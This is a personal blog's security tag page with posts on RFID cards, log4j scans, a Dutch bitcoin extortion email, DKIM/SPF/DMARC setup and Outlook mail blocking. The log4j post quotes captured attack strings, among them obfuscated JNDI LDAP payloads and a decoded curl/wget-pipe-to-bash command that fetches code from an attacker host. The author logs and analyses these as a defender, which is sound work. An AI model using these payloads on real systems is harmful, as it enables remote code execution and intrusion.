News items for tag security - Koos van den Hout

2022-01-21 Looking at RFID cards and NFC again
I haven't done anything with NFC in ages. Almost three years ago I dug up my knowledge again and learned about UID changeable cards and before that the last real digging into RFID was 11 years ago: Interesting development with the magna carta rfid card.

Anyway, my interest is renewed due to several factors, with "just looking for something to learn about and enjoy the process" as main one. As a first step I dug up my trusty touchatag reader and the collection of RFID tokens/cards. The touchatag reader still doesn't see any of the collected ski passes so I guess those are for other frequencies.

The collection of RFID tokens includes a number of one-use public transport tickets. Those are based on Mifare Ultralight "MF0ICU1" according to NXP TagInfo. The little bit that annoys me is that NXP TagInfo manages to list the transport company and the transaction date/time while I can't find any listing of the fields in a Mifare Ultralight for transport use online on a first search. Later searches (see below) give a lot more!

So I have to do some digging myself. And maybe get a few more recent one-time-use public transport tickets to get an idea.
Read the rest of Looking at RFID cards and NFC again

Tags: , ,
2021-12-14 Finding out what one (java) attack tries to do
I checked the logs for some more actual attacks and found one to analyze.

Digging out the java class and decompiling it made it clear what it does in a windows environment: enumerate the number of computers seen in active directory in the last 100 days. And post the result to the server it came from. In Russia.

Tags: ,
2021-12-13 Logs full of jndi: scans
A large part of last weekend was filled with the log4j vulnerability at work. Now I have some more time to look at the effect this has had on my home server I'm seeing a patter of lots of 'friendly' scanners with a few actual attack attempts in between.

Some special ones from the logs:

Trying all the fields (URL, referrer and user-agent), probably a 'friendly' scanner:
45.83.66.84 - - [13/Dec/2021:04:53:21 +0100] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 404 969 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}"
Trying to circumvent web application firewalls that have been set up with simple rules against the log4j vulnerability. I'm not sure whether this is a 'friendly' scanner or an actual attempt at abuse.
138.197.216.230 - - [13/Dec/2021:11:39:59 +0100] "GET / HTTP/1.1" 200 2211 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
Trying to load a "Legitimate" java class.
167.172.44.255 - - [13/Dec/2021:17:26:02 +0100] "GET / HTTP/1.0" 503 652 borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass} - -> /
But related to an IPv4 address that is becoming famous, I find this gem:
45.155.205.233 - - [12/Dec/2021:06:38:34 +0100] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA==} HTTP/1.1" 200 2211 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA==}"
And decoding the obvious base64 gives:
echo -e KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC80NS44My4yMzIuMTM0OjQ0Myl8YmFzaA== | base64 -d ; echo
(curl -s 45.155.205.233:5874/45.83.232.134:443||wget -q -O- 45.155.205.233:5874/45.83.232.134:443)|bash
But I haven't been able to fetch anything from 45.155.205.233:5874 yet and I'm getting really curious what it is/was. The other IP address is the external address of the server, so I guess it's a way to make curl/wget not return an error code.

Tags: , ,
2021-12-01 Fraudepoging "Je hebt nog een betaalopdracht uitstaan"
Met zo'n onderwerpregel voor een e-mail bericht weet ik al zeker dat het een fraude poging is, maar het bleek dit keer een van de beruchte bitcoin afpersingspogingen te zijn. De tekst is weer behoorlijk goed nederlands:
Hallo! Helaas heb ik slecht nieuws voor je. Enkele maanden geleden heb ik toegang gekregen tot de apparaten waarmee je op het internet surft. Vervolgens heb ik je internetactiviteiten nagetrokken. Hieronder volgt een overzicht van de gebeurtenissen die hiertoe hebben geleid: Eerst heb ik van hackers toegang gekocht tot talrijke e-mail accounts (tegenwoordig is dat een heel simpele klus die gewoon online kan worden gedaan). Zonder enige moeite heb ik vervolgens kunnen inloggen op jouw e-mail account (xxxx @ yyyyyyy). Een week later heb ik het voor elkaar gekregen een Trojaans virus te installeren op besturingssystemen van al je apparaten die voor e-mail toegang gebruikt worden. Eigenlijk was dat heel eenvoudig (want je klikte op de links in je inbox emails).
En zo nog een heleboel tekst verder, maar het belangrijke deel:
Schrijf 1750€ naar mijn rekening (bitcoin equivalent op basis van de wisselkoers tijdens je overschrijving) over
Hieronder staat mijn Bitcoin wallet: 1HvuQda3pzxyCnTJVpb1TpADMF2s3GB6g6 Je krijgt precies 48 uur de tijd nadat je deze e-mail geopend hebt (2 dagen om precies te zijn).
Bitcoin wallet 1HvuQda3pzxyCnTJVpb1TpADMF2s3GB6g6 was al bekend bij bitcoinabuse en heeft zo te zien helaas al een bedrag ontvangen van bijna 4 keer 1750 euro.

Trap hier niet in, het is echt complete onzin wat er beweerd wordt en alleen maar een manier om geld afhandig te maken. Lees ook: Ik word per mail gechanteerd - Fraudehelpdesk.nl
Read the rest of Fraudepoging "Je hebt nog een betaalopdracht uitstaan"

Tags: , ,
2021-11-21 Help in debugging DMARC/SPF/DKIM from xs4all
This morning I had DMARC reports in my mail from xs4all. With all the testing of DMARC, DKIM and SPF I did yesterday I was confused for a while what caused this since my domain names shouldn't be linked to xs4all anymore in any way.

First I thought one of the DMARC testing autoresponders I tried was linked to xs4all or maybe somehow my domains still show some link to xs4all, but after a while it dawned on me that all the testing of DKIM was done via a forward that is still active on my now closed xs4all account.

My DMARC record currently says I want reports of problems, so I am getting those. Anyway, I guess it's all working and I'm seeing no new problems.

Oh and outlook[.]com is still rejecting my e-mail so no progress there. But then again Microsoft and not handling Internet e-mail standards correctly was something I ranted about before: 17 and a half years ago. Not a lot of improvement.

Tags: ,
2021-11-20 Setting the right SPF records
In debugging mail from the shell server I noticed something in the headers:
Authentication-Results: xs4all.nl; spf=none smtp.mailfrom=gosper.idefix.net;
        dkim=pass header.d=idefix.net; dmarc=pass header.from=idefix.net
The shell server sees itself as gosper.idefix.net and uses this on locally generated outgoing mail. I only had an SPF record for idefix.net so setting one up for gosper.idefix.net too can help fix things. I also need a DMARC policy allowing mail from subdomains of idefix.net, with more specific DMARC policies for active subdomains.

Tags: ,
2021-11-20 Publishing the information about using DKIM: dmarc records
After getting DKIM signing running with sendmail and opendkim I generated DKIM keys for idefix.net, configured them in the mailserver with opendkim and published them in DNS. The next thing to publish is a policy record showing that all outgoing mail for these domains should be signed.

I started with a policy that shows mail should be signed but to not reject it when it isn't, but report it to me as unsigned.
;; QUESTION SECTION:
;_dmarc.camp-wireless.com.      IN      TXT

;; ANSWER SECTION:
_dmarc.camp-wireless.com. 86400 IN      TXT     "v=DMARC1;p=none;sp=reject;pct=100;rua=mailto:dmarcreports at camp-wireless.com;"
With a similar policy for idefix.net. Mail with problems shouldn't be rejected yet: DNS propagation isn't instantaneous and testing first.

Tags: ,
2021-11-20 Trying to get DKIM running
My recent issues with getting my e-mail delivered made me look at DKIM signing of outgoing e-mail messages. To not break things I have started testing this with outgoing e-mail from camp-wireless.com which normally publishes it doesn't send mail at all, so the first steps were to change that policy: changing the MX record and SPF record.

I started reading into configuring sendmail with dkim and found OpenDKIM which can work as a sendmail milter.

Based on How to configure DKIM & SPF & DMARC on Sendmail for multiple domains on CentOS 7 I took the same steps for my Devuan installation.

In Devuan (and probably Debian/Ubuntu) there is a opendkim package for the service and a opendkim-tools package for the associated tools. I needed the second one to get the opendkim-genkey command. I can imagine keys being generated/managed on a different system than the actual signing server.

After configuring this for camp-wireless.com including generating a keypair and publishing the public key via DNS I started sending test messages but had no luck. It turned out the sending host has to be in the InternalHosts table of opendkim. I added the address ranges and after that things started to work.

After fixing that I got the results I wanted:
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=camp-wireless.com;
        s=gosper; t=1637408594;
        bh=YewDlohOT9RvALNQw4cVukwSpmAm5tXtGWJxLDUJZa4=;
        h=To:From:Subject:Date:From;
        b=GGMEeCY5xmgFDBQ5NzgZfAVvyr+ctBKOTGpwMqq1W/tgJYMY8WyzaM5XfEiWijGKr
        abBN5WLbiyoXsd62lNVxcDOBUYWzkOnwZCw5WgdlzZJSIxgRdnWMQLxL1E9BJdudwR
        zriX1/vAaR34RFM1kiSVp0dqa98/Kxfdp2DPPRDsAVJ6sdxqz1YHD4odveDcLEQQZv
        jUMNPVmQps90mZORtdKtOOWQP0RYkZvmjNsJZuwIrRkFvUzOmAVT6MDDf4kZ35lbes
        oAp0me8tQgoffNLRQpO7akSKhbh1Kn5fAv50WILhM0rK/ChkWqvOrcfgIwbSSPduzM
        DI1w23jCnwaKQ==
And a verification:
Authentication-Results: xs4all.nl; spf=pass smtp.mailfrom=camp-wireless.com;
dkim=pass header.d=camp-wireless.com
I was wondering about roaming users who authenticate to my mailserver and send messages that way. In a first test those messages get signed too. That means I can start signing mail from idefix.net and other production domain names!
Read the rest of Trying to get DKIM running

Tags: , ,
2021-11-19 Attacks on new sites are fast!
I was working on a new site for a project and requested a certificate for it. The time between the certificate being generated and the first attack was 3 minutes and 7 seconds.

15:12:10 UTC: certificate generated and published on the certificate transparancy log
15:15:17 UTC:
185.67.34.1 - - [19/Nov/2021:16:15:17 +0100] "GET /restapi.php HTTP/1.1" 404 1008 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
15:15:18 UTC:
185.67.34.1 - - [19/Nov/2021:16:15:18 +0100] "POST /gate.php HTTP/1.1" 404 1008 "-" "Dalvik/2.1.0 (Linux; U; Android 6.0.1; SM-J700F Build/MMB29K)"

Tags: , ,
2021-11-15 Blocking mail I can't answer
Someone mailed me a few days ago with an interesting question. So I typed a reasonably long answer. But upon sending this answer I received the following error message:
   ----- The following addresses had permanent fatal errors -----
<????????@outlook.com>
    (reason: 550 5.7.1 Unfortunately, messages from [45.83.232.134] weren't sent. Please contact your Internet se...ail.live.com/mail/troubleshooting.aspx#errors. [HE1EUR04FT003.eop-eur04.prod.protection.outlook.com])

   ----- Transcript of session follows -----
... while talking to outlook-com.olc.protection.outlook.com.:
>>> MAIL From:<?????? .at. idefix.net> SIZE=4837 BODY=8BITMIME
<<< 550 5.7.1 Unfortunately, messages from [45.83.232.134] weren't sent. Please contact your Internet service provider since part of their network is on our block list (S3150). You can also refer your provider to http://mail.live.com/mail/troubleshooting.aspx#errors. [HE1EUR04FT003.eop-eur04.prod.protection.outlook.com]
554 5.0.0 Service unavailable
Trying to get my IPv4 address allowed didn't work. The form for getting IP addresses whitelisted did not allow for IPv6 addresses, but then again outlook.com has no IPv6 addresses listed for its MX record. I would think microsoft would do something with IPv6 to support innovations in Internet but I guess they only do that to win contracts.

After a while I got a response with a ticket number and an hour later a response that looked like maybe a person had taken a look at it, with "Our investigation has determined that the above IP(s) do not qualify for mitigation." So that leaves me with possible mails from outlook[.]com that I can't answer, making me look bad because I don't seem to reply at all.

I'm convinced the mail setup is correct on my end. The domain idefix.net has an SPF record and the mail was sent out via the approved route.

The only solution I can think of at the moment is blocking mail from outlook.com at the protocol level with an error message pointing at a webpage what the problem is, so when someone sends an e-mail from outlook[.]com to one of my domains they will get an error message with an embedded hint what they should do, namely We cannot reply to your mail, please send us mail from a different domain, see https://idefix.net/mailreject.html for an explanation. About the same as microsoft does, although the careful reader might have noticed the error code S3150 is not mentioned at http://mail.live.com/mail/troubleshooting.aspx#errors.

Tags: , , , ,

IPv6 check

Running test...
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

RSS
Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: newstag.cgi,v 1.37 2022/02/15 21:48:19 koos Exp $ in 0.022026 seconds.